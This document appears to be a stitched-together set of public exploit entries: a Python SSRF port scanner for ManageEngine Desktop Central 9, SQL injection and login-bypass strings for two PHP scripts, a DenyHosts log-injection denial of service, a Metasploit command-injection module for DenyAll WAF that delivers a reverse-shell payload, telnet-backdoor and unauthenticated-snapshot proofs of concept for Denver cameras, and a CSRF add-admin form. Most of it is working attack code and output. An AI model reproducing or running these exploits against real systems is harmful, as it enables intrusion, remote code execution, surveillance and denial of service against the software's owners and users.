    cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73; buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false; JSESSIONID=D10A9C62D985A0966647099E14C622F8; DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'
    try:
        # verify=False disables TLS certificate validation for the test host.
        response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': 'https://192.168.56.250:8383/smtpConfig.do','Cookie': cookie,'Connection': 'keep-alive'},verify=False, timeout=10)
        text = response.text
        now2 = datetime.datetime.now()
        rest = (now2 - now1)
        seconds = rest.total_seconds()
        if ('updateRefMsgCookie' in text):
            return colored('Cookie lost',"yellow")
        if d == "0":
            print ('Time response: ' + str(rest) + '\n' + text + '\n')
        if (seconds > 5.0):
            return colored('open',"green")
        else:
            return colored('closed',"red")
    except:
        # Bare except: a timeout (10 s) or any other error lands here; the
        # elapsed time alone decides the verdict.
        now2 = datetime.datetime.now()
        rest = (now2 - now1)
        seconds = rest.total_seconds()
        if (seconds > 10.0):
            return colored('open',"green")
        else:
            return colored('closed',"red")
    return colored('unknown',"yellow")
# CLI: -i/--ip and -p/--port are required; -d/--debug is optional and is
# None when omitted (only the literal "0" enables verbose output).
# NOTE(review): the help strings were line-wrapped in the mailing-list copy
# and have been re-joined here.
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True)
    parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True)
    parser.add_argument('-d','--debug', help="ManageEngine Desktop Central 9 - SSRF Open ports (0 print or 1 no print)",required=False)
    args = parser.parse_args()
    timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)
    print (args.ip + ':' + args.port + ' ' + timeresp + '\n')
And:
$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
192.168.56.250:8080 open
$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
192.168.56.250:7777 closed
# # # # #
# Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection
# Google Dork: N/A
# Date: 17.03.2017
# Vendor Homepage: http://webstarslab.com
# Software : http://webstarslab.com/products/pasal-departmental-store-management-system/
# Demo: http://webstarslab.com/departmental-store-management-system/store/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/module.php?module=vendors&page=edit-vendors&id=[SQL]
# http://localhost/[PATH]/module.php?module=units&page=edit-units&id=[SQL]
# http://localhost/[PATH]/module.php?module=currency&page=edit-currency&id=[SQL]
# http://localhost/[PATH]/module.php?module=category&page=edit-category&id=[SQL]
# http://localhost/[PATH]/module.php?module=purchase&y=[SQL]&m=[SQL]
# tbl_users:id
# tbl_users:username
# tbl_users:password
# tbl_users:email
# tbl_users:full_name
# tbl_users:permission
# Etc..
# # # # #
source: https://www.securityfocus.com/bid/64478/info
DenyHosts is prone to a remote denial-of-service vulnerability.
Successfully exploiting this issue allows remote attackers to deny further SSH network access to arbitrary IP addresses, denying service to legitimate users.
ssh -l 'Invalid user root from 123.123.123.123' 21.21.21.21
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata. The payload is Python (Platform/Arch) because the injected
  # command is `python -c "<payload>"`; the appliance is reached over SSL on
  # port 3001 by default, below TARGETURI.
  def initialize(info={})
    super(update_info(info,
      'Name' => "DenyAll Web Application Firewall Remote Code Execution",
      'Description' => %q{
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
terminal command under the context of the web server user.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References' =>
        [
          ['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/']
        ],
      'DefaultOptions' =>
        {
          'SSL' => true,
          'RPORT' => 3001,
          'Payload' => 'python/meterpreter/reverse_tcp'
        },
      'Platform' => ['python'],
      'Arch' => ARCH_PYTHON,
      'Targets' => [[ 'Automatic', { }]],
      'Privileged' => false,
      'DisclosureDate' => "Sep 19 2017",
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
      ]
    )
  end

  # Reads the 32-character iToken from the unauthenticated download endpoint
  # (webservices/download/index.php?applianceUid=LOCALUID&typeOf=debug), whose
  # body carries a serialized `"iToken";s:32:"..."` entry.
  #
  # Detection note: an unauthenticated GET for this endpoint with typeOf=debug
  # is the first observable step of this exploit.
  #
  # @return [String, nil] the token, or nil on a non-200 reply or when the
  #   marker is absent
  def get_token
    # Taking token by exploiting bug on first endpoint.
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
      'vars_get' => {
        'applianceUid' => 'LOCALUID',
        'typeOf' => 'debug'
      }
    })

    if res && res.code == 200 && res.body.include?("iToken")
      # NOTE(review): the first character class is [a-z], not [a-f0-9]; a
      # token whose first character is a digit would not match and nil is
      # returned even though the marker is present.
      res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
    else
      nil
    end
  end

  # Vulnerability check: a successful token fetch means the unauthenticated
  # debug endpoint is exposed, which is reported as Appears (not Vulnerable,
  # since the second endpoint is not exercised here).
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    # If we've managed to get token, that means target is most likely vulnerable.
    token = get_token

    if token.nil?
      Exploit::CheckCode::Safe
    else
      Exploit::CheckCode::Appears
    end
  end

  # Two-step exploit: obtain the token, then POST to webservices/stream/tail.php
  # with the payload embedded in the `type` field as `$(python -c "...")`.
  # The response of the second request is discarded; presumably the payload is
  # expected to connect back on its own.
  #
  # Detection note: a POST to tail.php whose `type` field contains `$(` is the
  # injection itself.
  #
  # @raise fails via fail_with(Failure::NotVulnerable) when no token is found
  def exploit
    # Get iToken from unauthenticated accessible endpoint
    print_status('Extracting iToken value')
    token = get_token
    if token.nil?
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    else
      print_good("Awesome. iToken value = #{token}")
    end

    # Accessing to the vulnerable second endpoint where we have command injection with valid iToken
    print_status('Trigerring command injection vulnerability with iToken value.')
    # Random 5-7 letter prefix reused as both `stime` and the start of `type`;
    # the trailing semicolon is redundant in Ruby.
    r = rand_text_alpha(5 + rand(3));
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
      'vars_post' => {
        'iToken' => token,
        'tag' => 'tunnel',
        'stime' => r,
        'type' => "#{r}$(python -c \"#{payload.encoded}\")"
      }
    })
  end
end
# Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)
# Date: 27 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824
# Version: Denver SHC-150 (all firmware versions)
# Tested on: Denver SHC-150
A backdoor was found in the Denver SHC-150 Smart Wifi Camera. Other models may have this backdoor too.
So, the backdoor is a factory telnet credential - `default`. Just open the telnet connection with the camera on port 23 and enter `default` (yes, on these cameras, telnet service is served on port 23). After this, you'll get a Linux shell. The backdoor allows an attacker to execute commands at OS level through telnet.
PoC:
```
enty8080@Ivans-Air ~ % telnet 192.168.2.118 23
Trying 192.168.2.118...
Connected to pc192-168-2-118.
Escape character is '^]'.
goke login: default
$ ls /
bin home linuxrc opt run tmp
dev init media proc sbin usr
etc lib mnt root sys var
$ pwd
/home/default
$ exit
Connection closed by foreign host.
enty8080@Ivans-Air ~ %
```
# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot
# Date: 28 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826
# Version: Denver SHO-110 (all firmware versions)
# Tested on: Denver SHO-110
A backdoor was found in the Denver SHO-110 IP Camera. Other models may have this backdoor too.
So, the backdoor located in the camera's second http service, allows the attacker to get a snapshot through `/snapshot` endpoint. There are two http services in camera: first - served on port 80, and it requires authentication, and the second - served on port 8001, and it does not require authentication.
It's possible to write a script that collects snapshots and concatenates them, so the attacker is able to disclose the camera stream.
PoC:
http://<host>:8001/snapshot
# # # # #
# Vulnerability: SQL Injection + Authentication Bypass
# Date: 18.01.2017
# Vendor Homepage: http://www.scriptgiant.com/
# Script Name: Dentist Website Script
# Script Buy Now: http://www.popularclones.com/products/Dentist-Website-Script
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Authentication Bypass :
# http://localhost/[PATH]/admin_giant/ and set Username:'or''=' and Password to 'or''=' and hit enter.
# SQL Injection/Exploit :
# http://localhost/[PATH]/admin_giant/add_gallery.php?id=[SQL]
# http://localhost/[PATH]/admin_giant/client.entry.php?id=[SQL]
# Etc. Other files are affected too; they contain SQL injection vulnerabilities as well.
# # # # #
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)
# Date: 15-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: PHP 7.4.11 , Linux x64_x86
# --- Proof of concept --- #
# Vulnerable file : http://localhost/APR/admin/user.php
# Exploit:
<html>
<head>
<title>Add Admin</title>
</head>
<body>
<!--
  CSRF proof of concept. When the button is clicked by a browser that holds
  an administrator session, the form POSTs username/password to
  admin/user.php and the browser attaches the admin's session cookie. The
  request carries nothing that ties it to the legitimate site (no anti-CSRF
  token field), which is the weakness demonstrated.
  Mitigation on the server: require a per-session CSRF token on
  state-changing requests and mark the session cookie SameSite.
-->
<h1> Absolutely Not Vulnerable Site :D </h1>
<form method="POST" action="http://127.0.0.1/APR/admin/user.php">
<input type="hidden" name="username" value="lol">
<input type="hidden" name="password" value="321" >
<button type="submit" name="submit">Click</button>
</form>
</body>
</html>